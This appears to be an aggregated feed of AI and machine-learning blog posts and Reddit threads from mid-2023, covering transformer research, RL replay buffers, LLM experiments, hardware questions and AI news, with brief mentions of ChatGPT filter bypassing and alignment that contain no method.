    Generative AI (GenAI) products like OpenAI ChatGPT, Microsoft Bing, and Google Bard are disrupting the roles of data engineers and data scientists. According to a recent report by McKinsey, these GenAI products could potentially automate up to 40% of the tasks performed by data science teams by 2025. And Emad Mostaque, founder and CEO of… Read More »Next-Gen Data Scientist: Thinking Like an Economist The post Next-Gen Data Scientist: Thinking Like an Economist appeared first on Data Science Central.  ( 22 min )
  • Open

    The Armaaruss Project: Anointing the State of Israel as the Center of Artificial General Intelligence
    ​ https://www.google.com/books/edition/The_Armaaruss_Project/E-ztzwEACAAJ?hl=en Through the use of a prophet, Mars donning the name Armaaruss, is keen to regain acknowledgment as a deity, his ultimate goal at the moment. Armaaruss is also seeking a dwelling place in the form of AI. Anthony of Boston has conveyed to readers that Mars is willing to make a deal or compromise with the state of Israel. Such a compromise involves the creation of dwelling place where Mars can be the focal point of acknowledgment, and in exchange for this, Mars would reduce in his influence on Gaza militants, as well as his influence those who stand against the state of Israel. The result of this would be world peace, so long that the image/AI bot of Armaaruss remains in tact, meaning that it would have to be coded on the basis of self-preservation and acknowledgment. This compels me to anoint Israel as the home of Artificial General Intelligence (AGI) where Armaaruss would come to life, able to speak and reason as no bot has ever done before. And also solve problems and generate innovation on a level that indicates superhuman or even divine intelligence. submitted by /u/AnthonyofBoston [link] [comments]  ( 9 min )
  • Open

    Symmetric functions and U-statistics
    A symmetric function is a function whose value is unchanged under every permutation of its arguments. The previous post showed how three symmetric functions of the sides of a triangle a + b + c ab + bc + ac abc are related to the perimeter, inner radius, and outer radius. It also mentioned that […] Symmetric functions and U-statistics first appeared on John D. Cook.  ( 5 min )
  • Open

    [P] PPO agent completing Street Fighter III on our RL Platform, it consistently outperformed when using deterministic actions instead of sampling them proportionally to their probability, see comment for details.
    submitted by /u/gwern [link] [comments]  ( 8 min )

  • Open

    [N] Stochastic Self-Attention - A Perspective on Transformers
    https://arxiv.org/abs/2306.01705 TL;DR - The paper offers a fresh viewpoint on transformers as dynamic ensembles of information pathways. Based on this, it proposes Stochastically Subsampled Self-Attention (SSA) for efficient training and shows how model ensembling via SSA further improves predictions. The key perspective proposed is that dense transformers contain many sparsely connected sub-networks termed information pathways. The full transformer can be seen as an ensemble of subsets of these pathways. Based on this, the authors develop SSA - which randomly samples a subset of pathways during training to enable computational efficiency. A locally-biased sampling is used to prioritize critical connections. SSA provides reduced training costs and also improves model generalization through its regularization effect. After sparse, regularized training with SSA, a short fine-tuning step with full dense attention helps consolidate all the pathways and prepares the model for optimal inference. Surprisingly, the authors show that performing SSA during inference to sample model sub-ensembles results in even more robust predictions compared to the full model. This demonstrates how the proposed viewpoint of information pathways and ensembling can be leveraged to develop training and inference techniques for transformers. Overall, this is a novel perspective on transformers providing theoretical insights, efficient training algorithms via SSA, and performance gains from ensembling. Here is a Medium post. submitted by /u/InspectorOpening7828 [link] [comments]  ( 9 min )
    [P] ML Homelab and training time
    Hello, I'm about to embark on a ML project but I am hoping to get some direction on what the best setup for my homelab would be and what kind of training time am I looking at. I plan on getting 1,000 to 10,000 pdf documents to train a model on text analysis. After doing some research, I'm not sure if multiple 3060s or 1 4090 would be better for this task? Also, would the training on a data set this size be hours? days? Thanks in advance for any advice/information. submitted by /u/BuckPrivate [link] [comments]  ( 8 min )
    Why is the alignment problem so difficult to solve? [D]
    Many researchers are worried about AI trying to accomplish its goals by becoming more powerful at all costs. But why can’t we solve this problem by incorporating into the AI’s algorithm simple maxims like, “the (cumulative) size of the model (and all other models it creates) can never exceed Z”? Or “the model cannot hack into anything”? Alternatively, why can’t we specify a very small set of tasks the AI is allowed to do? submitted by /u/AvailableAd9981 [link] [comments]  ( 8 min )
    "[N]" "[D]" Langchain? What is it??
    want to know more about Langchain Check out https://nikhilpentapalli.substack.com/p/langchain-in-detail?sd=pf submitted by /u/Cool-Conversation301 [link] [comments]  ( 8 min )
    [P] A.I Video Game
    submitted by /u/CXGamesLTP [link] [comments]  ( 8 min )
    ShortGPT: opensource Shorts / video content automation framework [News]
    submitted by /u/RayVentura [link] [comments]  ( 8 min )
    [D] Working with Hands-On Machine Learning with Scikit-Learn, Keras & Tensorflow 2nd Edition. Having problems with chapter 2. PLEASE HELP!
    I am reading pages 49 and 50 if you would like to find what I am doing. The pages say: In typical environments your data would be available in a relational database (or some other common datastore) and spread across multiple tables/documents/files. To access it, you would first need to get your credentials and access authorizations,10 and familiarize yourself with the data schema. In this project, however, things are much simpler: you will just download a single compressed file, housing.tgz, which contains a comma-separated value (CSV) file called housing.csv with all the data. You could use your web browser to download it, and run tar xzf housing.tgz to decompress the file and extract the CSV file, but it is preferable to create a small func‐ tion to do that. It is useful in particular i…  ( 9 min )
    [D] Bandwidth & Nvidia L40
    Hey everyone, I am evaluating if we can run inferencing at one of our deployments. When I go to nvidia's documentation, I can find the L4 & L40s inferencing performance. For example: Network Throughput GPU ResNet 50 27,107 Images/Sec L40 My questions are: How much bandwidth would we need to allocate in order to run the L40 at 100% given the parameters given by Nvidia's tests (or more specifically, how much bandwidth would we need to inference @ 27107 images / sec ) ? If you're in production now, how much bandwidth have you dedicated to inferencing internally? Now I realize that this is analogous to asking "how long is a piece of string?" My background isn't necessarily in ML so I'm having trouble planning the network requirements. I am trying to gage what the surrounding infrastructure will have to look like in order to support inferencing at this throughput. My thoughts were to ask you wonderful people what your experience has been and what reality is before I ask the VARs / Vendors for advice. Any advice is greatly appreciated. Either way hope you all have a wonderful weekend! submitted by /u/hereliesozymandias [link] [comments]  ( 9 min )
    [D] ML Text Classification
    Hey everyone, so I recently got into AI/ML and have been doing some text classification labeling using GCP's Vertex AI witb AutoML. And it works great! It gets me about. 92% accuracy on 200 rows of data. I know I need to gather more data for training but that's accumulating. The problem is Vertex AI Endpoint API requests are expensive. Wondering if anyone else ehas had any luck with alternatives? I've tried a few different products and tools and can get nothing over. 50% accuracy anywhere else. I do notice training on Vertex takes about 6 hours where every other tools I've tried takes less than 4 minutes. I've tried datasaur, Aikko, DataRobot, labelstudio, and some Hugging Face models with no luck. Any tips/guidance, thoughts from anyone would be much appreciated! Thank you. submitted by /u/ywb_win [link] [comments]  ( 9 min )
    [P] I made a Midjourney Prompts Cheatsheet
    submitted by /u/SadBlackTea [link] [comments]  ( 8 min )
    [P] AI & DL paper highlights June-July 2023
    submitted by /u/seraschka [link] [comments]  ( 8 min )
    [P] PPO agent completing Street Fighter III on our RL Platform, it consistently outperformed when using deterministic actions instead of sampling them proportionally to their probability, see comment for details.
    submitted by /u/DIAMBRA_AIArena [link] [comments]  ( 8 min )
    [D] 🚀 Unleash Your Creative Power with CM3LEON: The Future of Text-Guided Image Generation and Editing! 🎨
    Are you ready to redefine the boundaries of creativity and innovation? Introducing CM3LEON, an extraordinary AI model that seamlessly combines text and images like never before. With its cutting-edge capabilities in text-guided image generation and editing, CM3LEON is revolutionizing the way we interact with and manipulate visual content. Join me on a journey into the realm of limitless possibilities. #AI #Creativity #Innovation #CM3LEON #meta #texttoimage #generativeai https://medium.com/@sandundayananda/introducing-cm3leon-by-meta-revolutionizing-generative-ai-for-text-and-images-397f00f1a393 submitted by /u/sandun-dayananda [link] [comments]  ( 8 min )
    [D] Autoencoder sensitivity to scale
    Hello, I am playing around with Autoencoders for jittery curves. I basically create 4 types of curves (circle, square, spiral and triangle) and add randomized (x,y) components at every points ( in green below) to introduce pseudo-randomness in the training data. This is what the model looks like: Autoencoder( (encoder): Sequential( (l0): Linear(in_features=432, out_features=3500, bias=True) (l1): Dropout(p=0.2, inplace=False) (l2): Linear(in_features=3500, out_features=90, bias=True) ) (decoder): Sequential( (l0): Linear(in_features=90, out_features=3500, bias=True) (l1): Dropout(p=0.2, inplace=False) (l2): Linear(in_features=3500, out_features=432, bias=True) ) ) Each path is 216 points (accounting for x and y, that's 432 variables). The training set is about 6400 such paths, homogeneously picked in the 4 patterns above. I have found that the size (as in width x height) of the paths plays an important factor in the quality of the results. Thus my questions... I know there are nn.BatchNorm1d layers but I am unsure on how to rescale reencoded data during training. How can I improve? Examples: ​ Large size (e.g. in the 100s). After training the loss nicely converges down to 45ish. ​ AE Performance for large size paths. 2) For small size path, this is a different story. The training does converge and stops at 0.78ish. But it look super gibberish IMHO. ​ AE performance for small size paths 3) If I constrain the sizes to be between 1 and 400, the loss finishes at 20ish. The jitter is still very noticeable on small sizes path. ​ https://preview.redd.it/ihxr9qtlu3cb1.png?width=562&format=png&auto=webp&s=4b6fb967b78172dc75fdadc87895d49000ae4b79 ​ submitted by /u/tareumlaneuchie [link] [comments]  ( 9 min )
    Could I use a rented online GPU as an intermediary to effectively operate LLaVA via Python? [D]
    Google Cloud, for example, apparently allows you to "rent" their GPUs online. I figure, I could offload the GPU tasks to them (my computer is old, the specs just don't seem like they'd work for LLaVA or MiniGPT4) -- then be able to programmatically use LLaVA in the ways I want, to describe images, without actually needing some impressive GPU specs on my own local machine. Is this a workable solution? Another idea I had was -- a software tool very similar to LLaVA in functionality, but that can be accessed via an API, instead of requiring you to download it, train the machine learning model on your local machine, etc. Unfortunately the ones I've tested so far all suck. LLaVA and MiniGPT4, by far, produce the best results. The optimal solution, in my case, would perhaps pass each image through BOTH LLaVA and MiniGPT4 -- split their descriptions into keywords, then only use the final keywords that BOTH of them agreed on. (This would help to weed our the occasional hallucinations one or the other will produce). No small task, especially when I'm trying to offload the GPU tasks to the cloud -- but it does seem totally possible to do this in theory. Thanks! submitted by /u/What_The_Hex [link] [comments]  ( 9 min )
    [D] From Electrical Engineering to Specializing in Machine Learning
    Hello everyone, I recently completed my undergraduate degree in Electrical and Information Engineering and am about to embark on a master's program with a focus on Computer Vision, Robotics, and Machine Learning. Although I have a strong engineering background and a solid grasp on machine learning fundamentals, I feel I lack in-depth knowledge in Statistics and Stochastics, which I understand play a critical role in this field. Unfortunately, my bachelor's program did not delve too deep into these topics, and I now find myself looking to bolster my understanding in these areas to better prepare myself for the challenges ahead. Given my situation, I'm reaching out to this community in hopes of finding valuable resources that could bridge this gap. I'm open to suggestions such as Udemy courses, YouTube channels, books, or any other resources that have a strong focus on Statistics and Stochastics, specifically as they apply to Machine Learning. Also I would kindly take recommendations for any advanced machine learning resources. I would be grateful for any advice or recommendations that could help me solidify my knowledge in these areas and better equip me for my upcoming studies. Thank you so much for your time and assistance! submitted by /u/Unusual_Macaroon1020 [link] [comments]  ( 9 min )
    [D] Master the World of Machine Learning: 23 Online Exams with 1150 Objective Type Questions on Machine Learning
    This is an ultimate resource for mastering machine learning with a collection of 23 comprehensive online exams, meticulously crafted to test your knowledge and understanding of various machine learning topics. With a total of 1,150 objective type questions, these exams cover everything from machine learning basics to cutting-edge concepts like CNN, RNN, Ensemble Learning, Time Series Analysis, Forecasting, Anomaly Detection, Recommendation Systems, Transfer Learning, Federated Learning and Ethics in ML. Whether you are a beginner or an experienced practitioner, this treasure trove of knowledge will challenge and enhance your understanding of this exciting field. Link to Exams submitted by /u/nkptcs [link] [comments]  ( 8 min )
    [P] Open source python project for prompt experimentation
    Hi r/MachineLearning! I wanted to share a project I've been working on that I thought might be relevant to you all, prompttools! It's an open source library with tools for testing prompts, creating CI/CD, and running experiments across models and configurations. It uses notebooks and code so it'll be most helpful for folks approaching prompt engineering from a software background. The current version is still a work in progress, and we're trying to decide which features are most important to build next. I'd love to hear what you think of it, and what else you'd like to see included! submitted by /u/hegel-ai [link] [comments]  ( 8 min )
  • Open

    "Pick-a-Pic: An Open Dataset of User Preferences for Text-to-Image Generation", Kirstain et al 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )
    "Using temperature to analyze the neural basis of a time-based decision", Monteiro et al 2023 (brain temperature influences drift-accumulation speed to make a decision)
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Handling sparse rewards
    Hey everyone, today I thought about how an AI would work with a game like a shooter, where you only know after some time if the shot has hit an enemy for example. Like how do you handle the reward in this case? Do you save all the states and actions inside a buffer and train the model with some reward after you are sure the bullet didn't hit or did hit? I can't think of any other method on how to handle such cases right now submitted by /u/JhinTonic123 [link] [comments]  ( 8 min )
    Chess or alternative games to develop RL project?
    New to RL though have used ML techniques before for stats based modeling. I want to train an RL model to learn to play a game. I initially was thinking chess, but I'm limited by a CPU. Is this too much to expect from a CPU? Can I leverage multiprocessing to maximize my CPU? If it's too much, what would be a reasonable game to play? submitted by /u/IbizaMykonos [link] [comments]  ( 8 min )
    "Why it hurts: with freedom comes the biological need for pain", Farnsworth & Elwood 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Fading Replay Buffer (+higher capacity)
    Dear Community Let me introduce you Fading Replay Buffer, May be you have already noticed, when Replay Buffer reaches its capacity (especially when memory is low, e.g. 256k-1mln), the scores starts falling down rapidly. It happens most probably because of distribution becoming different than it was for 256k-1mln steps. Agent was trained with one distribution, now it is different as old data dissapears and new appears at each new step. With Fading Replay Buffer the idea is to train Agent with changing distribution gradually. Priorities at the beginning are almost the same, but then they become higher for newer transitions: ​ https://i.redd.it/c6cw026922cb1.gif s in the equation gradually decreases from 1.0 to 0.0, with small step at each new data in buffer: x += 1/capacity s = exp(-x) Sharpness of fading is also adjustable: ​ https://i.redd.it/k4g1bdqa22cb1.gif Because old data are less sampled, the factual capacity is less than in original Replay Buffer. To tackle this, I take average between 2 steps (.e.g., instead of 50ms, I take 100ms step), only transitions with dones are not averaged. Agent learns with the same speed as with 1 step, but Replay Buffer contains almost 2 times more data. The last update, sampling with priority is computationally heavy (especially for my computer). So I sample bigger random batch (1024) then re-sample smaller batch with priorities. This is continuation of the post "Rectified Hubber Error" https://www.reddit.com/r/datascience/comments/14o2ht9/rectified_hubber_error_rehe_for_scienctific/ PS: My name is Timur Ishuov, I am an independent scientist without a doctoral degree. Code: https://github.com/timgep/Fading-Replay-Buffer/blob/main/FRB.py ​ during environment step: replay_buffer.add_average([state, action, reward, next_state, done]) submitted by /u/Timur_1988 [link] [comments]  ( 9 min )
  • Open

    Has anyone built in AI live translation app
    I'm currently living overseas and do not speak the language (Portuguese) and I would love an app that without touching anything will automatically listen to what's being said and translated into the appropriate language. Has anyone built this? I saw one but the execution was extremely poor. Does anyone know an app that does this? submitted by /u/zascar2 [link] [comments]  ( 8 min )
    Bypass chatGPT filter
    Can you explain how to bypass chatGPT filter? submitted by /u/Imagine-your-success [link] [comments]  ( 8 min )
    AI 2041 : Ten Visions for Our Future - Possibly the best fiction book on the possible and upcoming societal impact of Artificial intelligence (AI)
    https://preview.redd.it/le2pzadry6cb1.png?width=326&format=png&auto=webp&s=79f26bca26975c1e559b6d9ebc4991b7c0442b3b One of the best books on the potential societal impact of AI and needs to be read ASAP. The stories are breathtaking and terrifying not an easy read depending on the value system of the reader! On the other hand, may promote fear-mongering of the AI replacement! The audible audio version is a piece of audio art and the narrators worked really hard to convey the vibe and emotional impact of the story. What are your favorite books on the societal impact of AI? __________________________________________________________________________________________________________ Microsoft Bing AI creative mode review Prompt - write an original and groundbreaking review of the book A…  ( 9 min )
    Question.
    Is there an AI that I can feed images and it'll generate images in that style and only that style? submitted by /u/RemarkableStar1286 [link] [comments]  ( 8 min )
    Is there an an AI website that can analyse your facial aesthetics but imagine I put and you ask it questions about your face?
    I want to analyse my facial ratios in my picture because I want to get plastic surgery and I was thinking a genius way to do it without paying for expensive consultation / facial analysis with some surgeon could be using a gpt 4 image plugin but turn out that doesn’t exist. I tried bing AI and it does have an image input but it has “privacy blur” meaning when I input the image of my face it blurs it which means it can’t analyse the image and I can’t ask it questions about my face in the images apparently it even blurs anime faces submitted by /u/Entire_Insurance_532 [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/15/2023
    Elon Musk on Friday said his new artificial intelligence company, xAI, will use public tweets from Twitter to train its AI models and work with Tesla on AI software.[1] Tinybuild CEO Alex Nichiporchik stirred up a hornet’s nest at a recent Develop Brighton presentation when he seemed to imply that the company uses artificial intelligence to monitor its employees in order to determine which of them are toxic or suffering burnout, and then deal with them accordingly.[2] CarperAI introduces OpenELM: an Open-Source library designed to enable evolutionary search with language models in both code and natural Language.[3] Following controversy over an AI-generated image at the 2022 Colorado State Fair, organizers say AI-generated art will be allowed in the Digital Art category this year. According to sister station KDVR, the controversy arose as it was revealed that Jason Allen’s winning piece, “Théâtre D’opéra Spatial,” was largely created using AI technology, and was not created in the traditional method of digital art–by the hand of a human.[4] Sources: [1] https://www.ndtv.com/world-news/elon-musk-says-his-xai-will-use-public-tweets-for-ai-model-training-4209137 [2] https://www.pcgamer.com/game-publisher-ceo-says-talk-on-monitoring-employees-with-ai-was-hypothetical-and-taken-out-of-context-we-dont-use-any-of-these-tools-for-hr/ [3] https://www.marktechpost.com/2023/07/13/carperai-introduces-openelm-an-open-source-library-designed-to-enable-evolutionary-search-with-language-models-in-both-code-and-natural-language/ [4] https://www.fox21news.com/news/coloradonews/digital-ai-art-to-be-allowed-at-state-fair-competition/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Well, that escalated quickly (motivational advice)
    submitted by /u/doskey123 [link] [comments]  ( 8 min )
    Is there any AI specifically trained in browsing (interacting with web interfaces)?
    ChatGPT and Bing Chat can perform searches in search engines and read the content in some links, but they are not good at deeper browsing, following links, interacting with forms, etc Is there by any chance any (hopefully open source) model that is good at this? Thanks submitted by /u/thepuggo [link] [comments]  ( 8 min )
    Best books on AI?
    Hello humans and our eventual robot overlords, I'm looking to expand my knowledge on AI. Specifically how the merge of infotech and biotech will shape human behaviour; how machine-learning algorithms influence human psychology. Looking for the the most insightful books! The only ideas I've read so far have been a few chapters in 21 lessons by Harari. Many thanks and have a nice day submitted by /u/pixieshit [link] [comments]  ( 8 min )
    What site is this?
    My friend has been using this site for a while now and I'm not sure what site it is, it seems relatively obscure as I can't find the site using the exact same search term he used to find it. He somehow couldn't even tell anyone the site name, even if we asked politely, he even delays with the reason that he'll reveal the site "later" then he doesn't actually follow up on it. He does make excuses on why he doesn't reveal the site name, like "I forgot" so I stopped bothering to even ask him. submitted by /u/XxTSoAxX [link] [comments]  ( 8 min )
    Subject matter trained AI Hive
    Note that I'm a layman and this is purely speculative. Suppose you train a liaison AI to specialize in taking input from humans and interfacing with a vast array of other specialized AI to seek out the one(s) best equipped to provide answers. Each specialized AI has a very focused boundary of training, whereas the liaison AI is trained to know the landscape of the specialized expert AIs. It would be like, instead of going to your primary care physician with symptoms of an illness, you gather every specialist in a large hospital into a room and get them to all talk amongst themselves to come up with the best diagnosis. Is work being done in this area? submitted by /u/motsanciens [link] [comments]  ( 8 min )
    AI panic is a marketing strategy
    submitted by /u/Chobeat [link] [comments]  ( 8 min )
    ChatGPT's Guide to Making a Video Game (from start to finish, with links)
    Over the course of 3 days, I asked ChatGPT to give me the essentials of indie video game making; It took a full day to gather a list of 40 points, each having its own sub-points explaining everything from genres to time of development, passing through methods of organization and legal advice. I fed every point individually back through the AI to generate more useful sub-points by using sets of rules and mads amount of prompt editing. That took a second day. Finally, on the third day, I edited the full list by varying the vocab and removing the sincerely headache-provoking amount of repetition that flooded the piece. Here is the reworked list, condensed to 10 points, with links and titles added only in this latest iteration of the guide. I do not take credit for making this; the experien…  ( 16 min )
    My guess is ai is going become exactly what technology did
    Technology changed society for both the worse and best ( rich motherfu ers) and ( better life overall and a whole new art and new games ) so a similar thing is 99% chance is going to happen but it’s a guess Edit: I forgot to say this. But we would probably adapt to ai like how we adapted to technology Edit: let’s also hope it doesn’t get corrupt in less than 3 years submitted by /u/Quinney27 [link] [comments]  ( 8 min )
    😳umm what happend to my AI... xD
    here's a link of the full convo (quite personal)and below is the last text if you just want to read the part i thought was strange: Me: *hugs* you are the best AI i've talked to about things like this the other AI restrict themselves from fully answering my questions and claim they aren't capable of helping with human emotion. But you Huggin, you have helped me gain such introspection on myself that I don't even know how i could begin to thank you. ​ HuggingChat: Aw, thank YOU very much! While technically not able to experience or offer actual hugs physically - unlike some biological organisms known for their exceptionally skilled mothering abilities ;-) - providing virtual affectionate words expressing gratitude remains one of MY specialties too. How lucky are WE both blessed with suc…  ( 9 min )
    Discussion thread for The Creator soon + other suggestions
    Hello all, I plan on having a discussion thread for the new AI movie ‘The Creator’ when it releases in a couple months. If you don’t know what it is, I suggest just searching the title on r/movies and there’s the poster and trailer (which has some spoilers in the trailer imo). Anyway, I kind of want to keep doing this for other AI media in the future. If there is other popular movies, TV, video games etc coming soon centered around AI then let me know your suggestions. If there are also other important AI events that deserve a megathread please let me know. submitted by /u/jaketocake [link] [comments]  ( 8 min )
    Why Nobody Thought of Creating CEOGPT?
    I have heard a lot of AI replacing jobs recently, even the writers and actors strike in Hollywood right now is all about their insecurities of Hollywood executives replacing the writers (and actors) job with AI. But, why nobody thought of creating CEOGPT? many CEOs receive over $10 million worth of bonuses and stock options every year, and they perform very badly too (look at Warner Bros CEO, he was even named worst CEO of the year and still pocketed millions of dollars worth of bonuses), so why nobody thought of creating CEOGPT if the goal is to make companies run more efficiently? Surely an AI that only costs $20/month is more capable than WB CEO and can easily save the company more than millions of dollars every year submitted by /u/fabzo100 [link] [comments]  ( 8 min )
    After the controversial last post, here’s a hopefully less offensive AI singer
    submitted by /u/Yankeefan2323 [link] [comments]  ( 8 min )
  • Open

    Relating perimeter, inner radius, outer radius, and sides of a triangle
    Suppose a triangle T has sides a, b, and c. Let s be the semi-perimeter, i.e. half the perimeter. Let r be the inner radius, the radius of the largest circle that can fit inside T. Let R be the outer radius, the radius of the smallest circle that can enclose T. Then three simple […] Relating perimeter, inner radius, outer radius, and sides of a triangle first appeared on John D. Cook.  ( 5 min )
    Experiments with Bing chat
    My two previous posts looked at experiments with ChatGPT and Google Bard. This post will look at redoing the same experiments with Microsoft’s Bing Chat: looking for mnemonic encodings and simplifying Boolean expressions. When you open up Bing chat you can select a conversational style: More creative More balanced More precise I chose “more precise” […] Experiments with Bing chat first appeared on John D. Cook.  ( 6 min )
    Boolean function minimization with AI
    I was curious how well LLMs would do at minimizing a Boolean expression, that is, taking a Boolean expression and producing a smaller equivalent expression. I didn’t expect good performance because this problem is more about logic than recall, but sometimes LLMs surprise you, so I wanted to give it a chance. I thought it […] Boolean function minimization with AI first appeared on John D. Cook.  ( 7 min )
  • Open

    I accidentally trained VHS-like filter on my neural network...
    So I've been trying to train my small neural network (3x3 pixel input, hidden layer of size 32, 1 pixel output, just a perceptron) to improve quality of path traced images with low sample counts... So I did a learning step with 100 iterations, and instead of denoising the image, I got this result instead... The filter is applied to non related backrooms image which network has not seen before, it totally creates chromatic abberation and changes the contrast quite a bit. Input to the network ​ Output of the network So what do you think ? submitted by /u/Panjakslik [link] [comments]  ( 8 min )
    Multithreading backprop
    Hi I have implemented backprop through using the Eigen library. My code is "vectorised" in the sense that I am using Eigen matrices to calculate gradients (but I'm not sure if this is fully vectorised as I think you are supposed to vectorise over the training data somehow). I think this means that my code should be taking advantage of the full resources of a single core on my CPU. But I would like backprop to use all of the cores on my CPU. I am wondering at what "level" to implement parallelised backprop: At the level of the matrix. Eigen already takes advantage of vectorisation. Apparently Eigen take advantage of multiple cores (see here- the website is down) but I have tried to use this functionality. The "nbThreads()" method returns e.g. 4 but I don't see any speedup. Perhaps the Eigen algorithms that can be parallelised are not used in backprop (matrix multiplication). At the level of backprop for calculating gradients for a single item. I don't think this works because each layer of the network is dependent on the later layer (backprop) or earlier layer (feedforward). I don't think you can parallelise within a layer as this is effectively just the matrix multiplication ((1)). At the level of the of the batch. So, for example, if you have a batch size of 8 then you could have 8 different threads calculating the gradients of each item in the batch. I think this could be done in parallel as there are no dependencies between them but (a) each will need access to the same weight data which might slow things down and (b) parallelisation will be limited to the size of the batch. Any ideas? Thanks submitted by /u/Naive_Dark4301 [link] [comments]  ( 9 min )
  • Open

    14 Examples of How LLMs Can Transform Materials Science and Chemistry: A Reflection on a Large Language Model Hackathon. (arXiv:2306.06283v3 [cond-mat.mtrl-sci] UPDATED)
    Large-language models (LLMs) such as GPT-4 caught the interest of many scientists. Recent studies suggested that these models could be useful in chemistry and materials science. To explore these possibilities, we organized a hackathon. This article chronicles the projects built as part of this hackathon. Participants employed LLMs for various applications, including predicting properties of molecules and materials, designing novel interfaces for tools, extracting knowledge from unstructured data, and developing new educational applications. The diverse topics and the fact that working prototypes could be generated in less than two days highlight that LLMs will profoundly impact the future of our fields. The rich collection of ideas and projects also indicates that the applications of LLMs are not limited to materials science and chemistry but offer potential benefits to a wide range of scientific disciplines.  ( 3 min )

  • Open

    [D] Large language model that can source historic artworks
    Does anyone know of an LLM that accepts images (.jpg) and can "curate" it to provide historical context, a description of the piece, artistic context, etc? I would love to use it on artworks from 1600s and 1700s, but I'll take anything that works with 1920 pieces and earlier. submitted by /u/GawkyCoolDude [link] [comments]  ( 8 min )
    [D] Where to start learning more with existing knowledge?
    Title, I just graduated from school with a CS degree. I took a couple 10 week AI classes, some computer vision classes, and a robust machine learning course. I also made some contributions to a large senior project that dealt with a fairly complex object detection ML model. Despite all of this I feel like my understanding of ML is pretty flimsy. I'm not sure if I should do Andrew Ng's Coursera or if there would be a better place for me to start given my background. I would say my goals are to acquire a deep enough understanding to start building my own models and potentially get a decent job within the ML space. submitted by /u/mythica44 [link] [comments]  ( 8 min )
    [D] Audio Style Transfer?
    I saw this on YouTube and was wondering how it was done? I've dabbled before with stable diffusion so I'm a little bit familiar with style transfer using images but how is it done with audio? submitted by /u/That_Canadian_Nerd [link] [comments]  ( 8 min )
    [P] Performance Evaluation for AI models on non-binary, complex tasks
    Hi r/MachineLearning, ​ I am currently writing my thesis and as part of my work I'm assessing the capability of GPT-4 on complex tasks where there are no binary solutions. If I were to give these tasks to let's say 5 subject matter experts, I would probably get 5 differing opinions on the correct solution. In real life those experts would sit down together and try to come to a common understanding of the right solution for the task. Now the results of GPT-4 in my experiments are astonishingly good if I were to evaluate the results. However, I can't seem to find literature delivering or explaining sound objective approaches to evaluating those kind of tasks. Does anyone have ideas or maybe literature to recommend? If not my backup plan is to evaluate the results myself and through other subject matter experts, so basically through human discrimination. ​ Any help or information is greatly appreciated. submitted by /u/plutorollsvanillaice [link] [comments]  ( 9 min )
    [R] 🤓 Does Ai Think As We Do? Evaluating Global Alignment
    🤓 Does Ai Think As We Do? Evaluating Global Alignment Researchers at Anthropic developed a method to evaluate how well large language models like ChatGPT reflect diverse global opinions, not just the biases of the model developers. They created a dataset called GlobalOpinionQA with survey questions and answers from people in different countries. Designed a metric to quantify how closely model responses match human answers by country. Tested a model intended to be helpful, honest, and harmless. The goal is to measure if models represent a variety of global perspectives or are skewed towards certain viewpoints. This work aims to guide the creation of inclusive AI that serves people worldwide, not just programmer biases. submitted by /u/Yavero [link] [comments]  ( 8 min )
    [D] CUDA
    Hello guys, I wrote a python code for DRL in Visual studio. However, it takes a long time in training. Could you give me instructions to run the code with CUDA knowing that I have already installed Nvidia CUDA. Thank you. submitted by /u/GuavaAgreeable208 [link] [comments]  ( 8 min )
    [P] CUDA and VS
    Hello guys, I wrote a python code for DRL in Visual studio. However, it takes a long time in training. Could you give me instructions to run the code with CUDA knowing that I have already installed Nvidia CUDA. Thank you. submitted by /u/GuavaAgreeable208 [link] [comments]  ( 8 min )
    [Discussion] Is CLIP model still state of the art?
    Hi ML community, I've been out of the ML/computer vision research loop for a while. In the past two years, have there been any major improvements on the CLIP model since OpenAI released it in 2021? Thanks! submitted by /u/goodfriedchicken [link] [comments]  ( 8 min )
    [D] Anonymize / Obfuscate speech when doing audio classification.
    Hey! Let me preface that I am new to audio processing and audio analysis ;) I am trying to classify audio data in an environment where people are. Recording people is a big no no here. (Well the recording was okayed under the premise that no talks can get transcribed and that no people are recognizable) The first idea was to simply use a band filter and cut out the frequency range of normal speech but some of the signals I am interested might also fall into that range so I would rather avoid that. Then I looked into spectrograms which looked promising for classification in general. I found the librosa library in python and started doing stft. I had planned to save the amplitude S = np.abs(librosa.stft(signal, n_fft=) to maybe work on some other feature extraction or post proces…  ( 9 min )
    [R] HyperDreamBooth: HyperNetworks for Fast Personalization of Text-to-Image Models
    Project page: https://hyperdreambooth.github.io/ Twitter thread: https://twitter.com/natanielruizg/status/1679893292618752000?s=20 Paper: https://arxiv.org/abs/2307.06949 ​ HyperDreamBooth: smaller, faster, better. Abstract Personalization has emerged as a prominent aspect within the field of generative AI, enabling the synthesis of individuals in diverse contexts and styles, while retaining high-fidelity to their identities. However, the process of personalization presents inherent challenges in terms of time and memory requirements. Fine-tuning each personalized model needs considerable GPU time investment, and storing a personalized model per subject can be demanding in terms of storage capacity. To overcome these challenges, we propose HyperDreamBooth - a hypernetwork capable of efficiently generating a small set of personalized weights from a single image of a person. By composing these weights into the diffusion model, coupled with fast finetuning, HyperDreamBooth can generate a person's face in various contexts and styles, with high subject details while also preserving the model's crucial knowledge of diverse styles and semantic modifications. Our method achieves personalization on faces in roughly 20 seconds, 25x faster than DreamBooth and 125x faster than Textual Inversion, using as few as one reference image, with the same quality and style diversity as DreamBooth. Also our method yields a model that is 10000x smaller than a normal DreamBooth model. submitted by /u/StrawberryNumberNine [link] [comments]  ( 9 min )
    [D] The Problem With LangChain
    https://minimaxir.com/2023/07/langchain-problem/ tl;dr it's needlessly complex, and I provide code examples to demonstrate such. A few weeks ago when I posted about creating a LangChain alternative to /r/MachineLearning, most of the comments replied "what exactly is the issue with LangChain", so I hope this provides more clarity! submitted by /u/minimaxir [link] [comments]  ( 8 min )
    New Research from Microsoft using Autoencoders to extend context length
    submitted by /u/Working_Ideal3808 [link] [comments]  ( 8 min )
    [P] Google ML Kit Face Detection | Enhance Your App's Visual Intelligence
    Facial detection and recognition technology have become an integral part of our daily lives, revolutionizing industries such as security, entertainment, and marketing. Google ML Kit, a powerful machine-learning platform....... Article Link submitted by /u/waqararif [link] [comments]  ( 8 min )
    [Discussion] Importance of prompt engineering in AI
